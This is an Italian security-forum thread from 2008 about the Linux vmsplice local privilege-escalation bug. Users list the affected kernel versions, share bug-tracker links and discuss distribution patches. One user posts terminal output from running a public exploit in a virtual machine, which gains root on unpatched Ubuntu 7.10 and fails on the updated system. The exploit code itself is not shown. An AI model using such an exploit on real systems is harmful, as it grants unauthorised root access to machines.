NoTrace Security Forum

NoTrace Security Forum
Home | Discussioni Attive | Discussioni Recenti | Segnalibro | Msg privati | Utenti | Download | cerca | faq | RSS | Security Chat
Nome Utente:
Password:
Salva Password
Password Dimenticata?

 Tutti i Forum
 Sistemi Operativi
 Linux/Unix
 Falla nel kernel linux
 Forum Bloccato
 Versione Stampabile Bookmark this Topic Aggiungi Segnalibro
I seguenti utenti stanno leggendo questo Forum Qui c'è:
Autore Discussione Precedente Discussione Discussione Successiva  

oRsO
Advanced Member




739 Messaggi


Inserito il - 07/03/2008 : 15:01:22  Mostra Profilo
Cito brevemente un articolo apparso sul n. 146 di HackerJournal, in edicola dal 6 Marzo.

Sembra che per un utente normale sia possibile, compilando ed eseguendo un apposito programma scritto in C, eseguire codice con il massimo dei privilegi: potrebbe, ad esempio, aprire una shell di root. Questo exploit sfrutta la chiamata di sistema vmsplice_to_user(): questa funzione copia il contenuto dei puntatori passati come argomento in un'area di memoria in kernel-space ed esegue poi gli altri comandi impartiti nel sorgente con i privilegi di root, senza alcun controllo se l'utente che avvia il processo abbia o meno tali privilegi.

Non essendo un grande esperto in materia, non vorrei aver denaturato l'articolo facendone qui una breve sintesi. Il nodo della questione, comunque, è che è possibile ottenere una shell di root sfruttando un bug nel kernel linux: più in particolare sembra siano affette le versioni comprese tra la 2.6.17.x e la 2.6.24, mentre sembra che il problema sia stato risolto con la 2.6.24.2; il repository di Ubuntu è fermo alla 2.6.22-14!!

Purtroppo l'articolo non è disponibile on-line, mentre è disponibile il codice sorgente dell'exploit. Chiedo il permesso ai moderatori di postarne il link..

Ho trovato questa pagina (in inglese) che sembra trattare lo stesso argomento, ma in maniera abbastanza superficiale.

bertoldo
Advanced Member



263 Messaggi

Inserito il - 07/03/2008 : 17:20:56  Mostra Profilo
il problema è stato classificato con diversi livelli di pericolosità a seconda della fonti

cmq alcune distro o autori hanno rilasciato immediatamenti o quasi kernel pachati od aggiornati, altri ancora forse non lo hanno fatto

Modificato da - bertoldo in data 07/03/2008 17:26:39
Torna all'inizio della Pagina

bertoldo
Advanced Member



263 Messaggi

Inserito il - 07/03/2008 : 18:44:06  Mostra Profilo
si possono avere maggiori info qui:

htt*s://bugs.launchpad.net/ubuntu/+source/linux-source-2.6.22/+bug/190587

mentre si può leggere un commento alla vicenda in Distributions and Security Update in questa pagina:

htt*://distrowatch[.com]/weekly.php?issue=20080218#feature
Torna all'inizio della Pagina

Trunks
Moderatore




2016 Messaggi

Inserito il - 07/03/2008 : 22:32:26  Mostra Profilo
Citazione:
Messaggio inserito da oRsO



...mentre sembra che il problema sia stato risolto con la 2.6.24.2; il repository di Ubuntu è fermo alla 2.6.22-14!!...




Mi deludi! :P Mica si deve per forza upgradare il kernel per fixare il problema :D Non ti sei accorto, durante gli aggiornamenti di ubuntu, un security upgrade linux-2.6 qualche tempo fa ? :D
Lodevole, per l'ennesima volta, debian, che come al solito è stata velocissima a rilasciare una patch.
I bug ci saran sempre, ma fa riflettere (in positivo) la rapidità con cui il mondo open riesce a reagire.

Modificato da - Trunks in data 07/03/2008 22:42:45
Torna all'inizio della Pagina

oRsO
Advanced Member




739 Messaggi

Inserito il - 08/03/2008 : 13:03:57  Mostra Profilo
Si mi sono accorto di un aggiornamento relativo al kernel, dopo il quale però non è cambiata la versione nè ho dovuto reinstallare i driver grafici.. =)) Chiedo scusa per la gaff!! =P

Comunque penso di installare Ubuntu da nuovo su una macchina virtuale e di testare l'effettivo funzionamento dell'exploit..
Torna all'inizio della Pagina

Trunks
Moderatore




2016 Messaggi

Inserito il - 09/03/2008 : 12:52:43  Mostra Profilo
Dovrebbe funzionare anche direttamente da live
Torna all'inizio della Pagina

oRsO
Advanced Member




739 Messaggi

Inserito il - 09/03/2008 : 15:25:27  Mostra Profilo
Ormai avevo installato.. =))

Utilizzo dell'exploit su Ubuntu 7.10 Gutsy appena installato con il cd alternate:
Citazione:
ubu[No-Spam]gutsy-virtual:~$ whoami
ubu
ubu[No-Spam]gutsy-virtual:~$ ./exploit
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7d8d000 .. 0xb7dbf000
[+] root
root[No-Spam]gutsy-virtual:~# whoami
root
root[No-Spam]gutsy-virtual:~#


Utilizzo dell'exploit su Ubuntu 7.10 Gutsy aggiornato:
Citazione:
orso[No-Spam]orso-ubu:~$ whoami
orso
orso[No-Spam]orso-ubu:~$ ./exploit
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e49000 .. 0xb7e7b000
[-] vmsplice: Bad address
orso[No-Spam]orso-ubu:~$ whoami
orso
orso[No-Spam]orso-ubu:~$

Modificato da - oRsO in data 09/03/2008 15:27:00
Torna all'inizio della Pagina

volley_3
Advanced Member


Nota: 


672 Messaggi

Inserito il - 09/03/2008 : 15:38:51  Mostra Profilo
si si gia tutto corretto
Torna all'inizio della Pagina
  Discussione Precedente Discussione Discussione Successiva  

 Forum Bloccato
 Versione Stampabile Bookmark this Topic Aggiungi Segnalibro
Vai a:
NoTrace Security Forum
© Nazzareno Schettino
RSS NEWS
Torna all'inizio della Pagina
Pagina generata in 0,25 secondi. TargatoNA | SuperDeeJay | Snitz Forums 2000